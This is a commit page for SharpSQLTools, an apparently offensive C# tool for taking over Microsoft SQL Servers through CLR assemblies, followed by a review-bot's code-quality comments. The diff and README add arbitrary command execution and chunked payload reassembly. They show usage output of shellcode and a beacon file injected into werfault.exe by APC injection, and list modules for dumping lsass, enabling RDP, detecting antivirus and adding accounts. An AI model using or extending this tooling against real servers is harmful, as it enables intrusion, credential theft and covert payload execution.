
Commit 735c8a4

committed
添加部分功能并更新readme
1.添加clr执行命令和程序 2.添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件 3.修改支持自定义端口 4.更新readme
1 parent 7abfb58 commit 735c8a4


3 files changed

+145
-37
lines changed


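--- a/README.md
+++ b/README.md
@@ -23,8 +23,8 @@
 
 Usage:
 
-SharpSQLTools target username password database - interactive console
-SharpSQLTools target username password database module command - non-interactive console
+SharpSQLTools target:port username password database - interactive console
+SharpSQLTools target:port username password database module command - non-interactive console
 
 Module:
 
@@ -40,7 +40,9 @@ enable_clr - you know what it means
 disable_clr - you know what it means
 install_clr - create assembly and procedure
 uninstall_clr - drop clr
-clr_dumplsass - dumplsass by clr
+clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
+clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
+clr_dumplsass {path} - dumplsass by clr
 clr_rdp - check RDP port and Enable RDP
 clr_getav - get anti-virus software on this machin by clr
 clr_adduser {user} {pass} - add user by clr
@@ -57,8 +59,8 @@ exit - terminates the server process (and this session)
 支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。
 
 ```
-SharpSQLTools target username password database - interactive console
-SharpSQLTools target username password database module command - non-interactive console
+SharpSQLTools target:port username password database - interactive console
+SharpSQLTools target:port username password database module command - non-interactive console
 ```
 
 
@@ -84,6 +86,35 @@ nt authority\system
 nt service\mssqlserver
 ```
 
+#### clr执行命令
+
+```
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami
+[*] Database connection is successful!
+[+] Process: cmd.exe
+[+] arguments: /c whoami
+[+] RunCommand: cmd.exe /c whoami
+
+nt service\mssql$sqlexpress
+
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe
+[*] Database connection is successful!
+[+] Process: c:\windows/system32\whoami.exe
+[+] arguments:
+[+] RunCommand: c:\windows/system32\whoami.exe
+
+nt service\mssql$sqlexpress
+
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami
+[*] Database connection is successful!
+[+] Process: c:\cmd.exe
+[+] arguments: /c whoami
+[+] RunCommand: c:\cmd.exe /c whoami
+
+nt service\mssql$sqlexpress
+
+```
+
 #### clr_scloader
 ```
 λ python Encrypt.py -f nc.bin -k 1234
@@ -94,7 +125,7 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
 [*] Database connection is successful!
 [+] EncryptShellcode: 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
 [+] XorKey: 1234
-[+] StartProcess notepad.exe
+[+] StartProcess werfault.exe
 [+] OpenProcess Pid: 2508
 [+] VirtualAllocEx Success
 [+] QueueUserAPC Inject shellcode to PID: 2508 Success
@@ -104,6 +135,36 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
 [*] QueueUserAPC Inject shellcode Success, enjoy!
 ```
 
+#### clr_scloader1
+```
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa
+[*] Database connection is successful!
+[+] EncryptShellcodePath: C:\Users\Public\payload.txt
+[+] XorKey: aaaa
+[+] StartProcess werfault.exe
+[+] OpenProcess Pid: 3232
+[+] VirtualAllocEx Success
+[+] QueueUserAPC Inject shellcode to PID: 3232 Success
+[+] hOpenProcessClose Success
+
+
+[*] QueueUserAPC Inject shellcode Success, enjoy!
+```
+
+#### clr_scloader2
+```
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin
+[*] Database connection is successful!
+[+] ShellcodePath: C:\Users\Public\beacon.bin
+[+] StartProcess werfault.exe
+[+] OpenProcess Pid: 332
+[+] VirtualAllocEx Success
+[+] QueueUserAPC Inject shellcode to PID: 332 Success
+[+] hOpenProcessClose Success
+
+
+[*] QueueUserAPC Inject shellcode Success, enjoy!
+```
 
 #### clr_dumplsass
 
@@ -153,7 +214,15 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
 [*] Adding Group Member success
 ```
 
-
+#### clr_combine
+```
+λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt
+[*] Database connection is successful!
+[+] remoteFile: C:\Users\Public\payload.txt
+[+] count: 5
+[+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt
+[*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed
+```
 
 #### clr_download
 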
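--- a/SharpSQLTools/Program.cs
+++ b/SharpSQLTools/Program.cs
@@ -30,6 +30,8 @@ private static void Help()
 disable_clr - you know what it means
 install_clr - create assembly and procedure
 uninstall_clr - drop clr
+clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
+clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
 clr_dumplsass {path} - dumplsass by clr
 clr_rdp - check RDP port and Enable RDP
 clr_getav - get anti-virus software on this machin by clr
@@ -255,37 +257,54 @@ static void DownloadFiles(String localFile, String remoteFile)
 Console.WriteLine("[*] '{0}' Download completed", remoteFile);
 }
 
-public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
+public static string result = string.Empty;
+private static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
 {
-String value = String.Empty;
+var value = string.Empty;
 foreach (SqlError err in args.Errors)
 {
-value = err.Message;
-Console.WriteLine(value);
+value += err.Message;
 }
+result = value;
+Console.WriteLine(result);
 }
 
-static void interactive(string[] args)
+/// <summary>
+/// 数据库连接
+/// </summary>
+public static SqlConnection SqlConnet(string target, string dbName, string uName, string passwd, ref string result)
 {
-string target = args[0];
-string username = args[1];
-string password = args[2];
-string database = args[3];
-
+SqlConnection Conn = null;
+var connectionString = $"Server = \"{target}\";Database = \"{dbName}\";User ID = \"{uName}\";Password = \"{passwd}\";";
 try
 {
-//sql建立连接
-string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target,database, username, password);
 Conn = new SqlConnection(connectionString);
 Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
 Conn.Open();
-Console.WriteLine("[*] Database connection is successful!");
+result = $"[*] Database connection is successful! {DateTime.Now.ToString()}";
+Console.WriteLine(result);
 }
 catch (Exception ex)
 {
-Console.WriteLine("[!] Error log: \r\n" + ex.Message);
+result = $"[!] Error log: {ex.Message}";
+Console.WriteLine(result);
 Environment.Exit(0);
 }
+return Conn;
+}
+
+static void interactive(string[] args)
+{
+string target = args[0];
+if (target.Contains(":"))
+{
+target = target.Replace(":", ",");
+}
+string username = args[1];
+string password = args[2];
+string database = args[3];
+string result = "";
+Conn = SqlConnet(target,database,username,password, ref result);
 
 setting = new Setting(Conn);
 
@@ -356,6 +375,13 @@ static void interactive(string[] args)
 clr_exec(s);
 break;
 }
+case "clr_exec":
+{
+String s = String.Empty;
+for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
+clr_exec(s);
+break;
+}
 case "clr_scloader":
 {
 String s = String.Empty;
@@ -384,6 +410,13 @@ static void interactive(string[] args)
 clr_exec(s);
 break;
 }
+case "clr_combine":
+{
+String s = String.Empty;
+for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
+clr_exec(s);
+break;
+}
 case "enable_clr":
 setting.Enable_clr();
 break;
@@ -429,24 +462,16 @@ static void Noninteractive(string[] args)
 return;
 }
 string target = args[0];
+if (target.Contains(":"))
+{
+target = target.Replace(":", ",");
+}
 string username = args[1];
 string password = args[2];
 string database = args[3];
 string module = args[4];
-try
-{
-//sql建立连接
-string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
-Conn = new SqlConnection(connectionString);
-Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
-Conn.Open();
-Console.WriteLine("[*] Database connection is successful!");
-}
-catch (Exception ex)
-{
-Console.WriteLine("[!] Error log: \r\n" + ex.Message);
-Environment.Exit(0);
-}
+string result = "";
+Conn = SqlConnet(target, database, username, password, ref result);
 
 setting = new Setting(Conn);
 try
@@ -525,6 +550,13 @@ static void Noninteractive(string[] args)
 clr_exec(s);
 break;
 }
+case "clr_exec":
+{
+String s = String.Empty;
+for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
+clr_exec(s);
+break;
+}
 case "clr_scloader":
 {
 String s = String.Empty;
@@ -553,6 +585,13 @@ static void Noninteractive(string[] args)
 clr_exec(s);
 break;
 }
+case "clr_combine":
+{
+String s = String.Empty;
+for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
+clr_exec(s);
+break;
+}
 case "enable_clr":
 setting.Enable_clr();
 break;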
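Review bot: `SqlConnet` in the `@@ -255,37 +257,54 @@` hunk builds the connection string by interpolating `target`, `dbName`, `uName` and `passwd` between literal double quotes, so a value that itself contains `"` (a password, typically) ends the quoted value early and either breaks parsing or lets the remainder be read as further connection keys; `SqlConnectionStringBuilder` escapes each value and should replace the `$"Server = \"{target}\";…"` line. In the same hunk the `ref string result` parameter shadows the new `public static string result` field, and both callers (`interactive`, `Noninteractive`) pass a fresh local they never read in the visible lines, so the parameter carries nothing out — drop it or write to the field consistently. `Environment.Exit(0)` in the catch reports success to whoever launched the process after a failed connection; a non-zero code is what callers expect. `OnInfoMessage` now concatenates `err.Message` values with no separator, so a batch that raises several messages prints them run together where the old code printed one per line; `value += err.Message + Environment.NewLine;` restores that. The `target.Replace(":", ",")` added in `interactive` and `Noninteractive` rewrites every colon, which would presumably mangle an IPv6 literal — worth a comment that only `host:port` is supported, as the README documents.

```csharp
public static SqlConnection SqlConnet(string target, string dbName, string uName, string passwd, ref string result)
{
    SqlConnection Conn = null;
    // Let the builder quote/escape each value instead of interpolating them into the string.
    var builder = new SqlConnectionStringBuilder
    {
        DataSource = target,
        InitialCatalog = dbName,
        UserID = uName,
        Password = passwd,
    };
    try
    {
        Conn = new SqlConnection(builder.ConnectionString);
        // … unchanged: InfoMessage hookup, Open(), success message …
    }
    catch (Exception ex)
    {
        result = $"[!] Error log: {ex.Message}";
        Console.WriteLine(result);
        Environment.Exit(1); // non-zero: the connection failed
    }
    return Conn;
}
```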

SharpSQLTools/Setting.cs

Lines changed: 2 additions & 2 deletions
